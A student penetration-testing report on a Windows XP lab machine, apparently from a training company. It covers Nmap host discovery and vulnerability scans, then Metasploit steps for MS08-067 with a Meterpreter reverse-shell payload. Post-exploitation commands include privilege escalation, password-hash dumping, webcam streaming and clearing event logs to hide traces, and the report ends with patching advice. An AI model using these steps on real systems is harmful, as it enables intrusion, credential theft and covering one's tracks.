Vulnerability Assessment & Penetration Testing Report
on
Windows XP
vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.
Vulnerability Assessment & Penetration Testing on Windows XP project done by ICSS Student Prashant Kumar. Here discussed the full process below.
Project Name: Vulnerability Assessment & Penetration Testing on Windows XP
Author Name: Prashant Kumar
Publish Date: 24-07-2018
Introduction:
Vulnerability Assessment and Penetration Testing (VAPT) is a Systematic analysis of security status of Information systems. Vulnerability assessment is an on-demand solution which makes it convenient to run tests over the Internet anywhere, anytime. It is a hybrid solution which blends automated testing with security expert analysis. The unique technology identifies all possible attack vectors. Vulnerability assessment offers partial evaluation of vulnerabilities, actually testing for vulnerabilities done by penetrating barriers is useful adjunct. As it identifies potential access paths missed by VAS. Penetration testing aka “pen testing” is the practice of testing a computer system, network or Web application to find vulnerabilities that an attacker could exploit.
Vulnerability Assessment & Pen tests can be automated with software applications or they can be performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting back the findings.
The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents done by Pen testers aka “Red Team”.
Life cycle of penetration testing:
Reconnaissance
Reconnaissance denotes the work of information gathering before any real attacks are planned. The idea is to collect as much interesting information as possible about the target. Reconnaissance is probably the longest phase, sometimes lasting weeks or months. But here we have a known target, a windows xp machine connected to same network as on us.to find the target machine we will run an Nmap scan.
After Nmap scan the live hosts are-
Now we need the os details of every system connected to the network so that we can find our target machine. So first we need to separate out the live ip address so we will save the above result in a text file and then filter the ip address using the command –
nmap -sV -sP 192.168.31.1-255 > livehosts.txt
cat host.txt | grep “for” | cut -d “ “ -f5 > ip.txt
The output is:
Now we have to check which one of them is a windows xp machine so we will run an script which will detect the os of all the live ip’s.
nmap -sV -O -iL ip.txt > osdetails.txt
And the output is:
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-23 02:06 IST Nmap scan report for XiaoQiang (192.168.31.1) Host is up (0.014s latency).
Not shown: 995 closed ports
PORT | STATE SERVICE VERSION | |
53/tcp | open domain dnsmasq 2.71 | |
80/tcp | open http | nginx |
8192/tcp open http | Tengine httpd | |
8193/tcp open http | nginx |
8899/tcp open http Tengine httpd
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/23%OT=53%CT=1%CU=41503%PV=Y%DS=1 %DC=D%G=Y%M=7811DC%T
OS:M=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)
OS:SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%TS=7)OPS(O1=M5B4ST11NW 7%O2=M5B4ST11NW7%O3
OS:=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6= M5B4ST11)WIN(W1=3890%W2=3
OS:890%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T =40%W=3908%O=M5B4NNSNW
OS:7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%F=AS%RD=0%Q=)T2 (R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=4 0%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 %Q=)T7(R=N)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G )IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 1 hop
Nmap scan report for 192.168.31.27
Host is up (0.016s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
62078/tcp open tcpwrapped
MAC Address: 88:19:08:C9:D6:A8 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/23%OT=62078%CT=1%CU=31349%PV=Y% DS=1%DC=D%G=Y%M=88190
OS:8%TM=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=RD%TS
OS:=A)OPS(O1=M5B4NW6NNT11SLL%O2=M5B4NW6NNT11SLL%O3=M 5B4NW6NNT11%O4=M5B4NW6N
OS:NT11SLL%O5=M5B4NW6NNT11SLL%O6=M5B4NNT11SLL)WIN(W1= FFFF%W2=FFFF%W3=FFFF%W
OS:4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M 5B4NW6SLL%CC=Y%Q=)T1(
OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4( R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A= S+%F=AR%O=%RD=0%Q=)T6(R
OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF= N%T=40%W=0%S=Z%A=S%F=A
OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=38%UN=0%RIPL=G%RI D=G%RIPCK=G%RUCK=0%RU
OS:D=G)IE(R=Y%DFI=S%T=40%CD=S)
Network Distance: 1 hop
Nmap scan report for 192.168.31.224
Host is up (0.00062s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 00:0C:29:BE:B1:2B (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE:
cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Nmap scan report for 192.168.31.44
Host is up (0.000017s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 4.1
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 6 IP addresses (4 hosts up) scanned in 261.30 seconds.
After analyzing the machine details the machine details in green font is our target machine. Now as we have identified our target we will move to next part.
Vulnerability scanning
In this part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerability in the system.
nmap -Pn –script vuln 192.168.31.224 > vuln.txt
The output is :
The above picture shows the list of vulnerabilities and they are as follows:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
This vulnerability exist but it doesn’t provide any user access so it can’t be used. The next one is,
smb-vuln-ms08-067
This vulnerability allows user to have remote access to the target system and it exist on windows xp 2003 machine which is our target.
Then the last one listed is
smb-vuln-ms17-010
This vulnerability also allows users to have remote access to the target system but it is not available for the windows xp 2003 machine it only exists in windows servers.
So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.
Attack & Penetration
Now as we know the vulnerability, we will search this in Metasploit framework database. Metasploit framework has a huge collection of exploits, payloads and modules which are used by the hacking community. So it can launched by typing msfconsole in the terminal.
Now we have search for the ms08_067 vulnerability. So we will type
search ms08_067
The description of this module is:
This module is used by following command.
use exploit/windows/smb/ms08_067_netapi
Now the following commands are used to see the payloads 0f this module and setting one of them as our requirement.
show payloads
We are going to use ‘windows/meterpreter/reverse_tcp’ payload.
set payload windows/meterpreter/reverse_tcp
show options
set rhost 192.168.31.224 (target ip address)
set lhost 192.168.31.44 (attacker ip address)
Now to get a access session with the target machine exploit command is used.
Post exploitation
Once we get a meterpreter session we have the full access of the target machine. we can do anything we want like we can escalate privilege by the command-
Getsystem
To confirm check the ip by command-
ipconfig
The following picture shows that-
We can see the options by typing help. Some common commands are:
sysinfo
getuid
hashdump
webcam_stream (If the target machine has a webcam)
download
cd
pwd
ls
reboot
When our task is completed. No longer need of the target machine we need to clear our footprints using command –
clearev
Conclusion & Recommendations
After reviewing the vulnerability and getting access of the system is a big security threat. Our data can be misused. So machine should be kept safe from such things.
This particular vulnerability was patched and released by the Microsoft a long ago so just perform a windows update and this vulnerability will automatically disappear.
Recommendations are:
- Always keep the machine & its software updated.
- Use a good antivirus.
- We can use a custom firewall too.
- Don’t install software from unknown source.
…………End of the report………..
Highest Selling Technical Courses of Indian Cyber Security Solutions:
Amazon Web Services Training in Hyderabad
Amazon Web Services Training in Bangalore
Amazon Web Services Training in Bhubaneswar
Summer Training for CSE, IT, BCA & MCA Students
Network Penetration Testing training
Certified Network Penetration Tester
Diploma in Web Application Security
Certified Web Application Penetration Tester
Certified Android Penetration Tester
Cybersecurity services that can protect your company:
Web Security | Web Penetration Testing
Network Penetration Testing – NPT
Android App Penetration Testing
Other Location for Online Courses: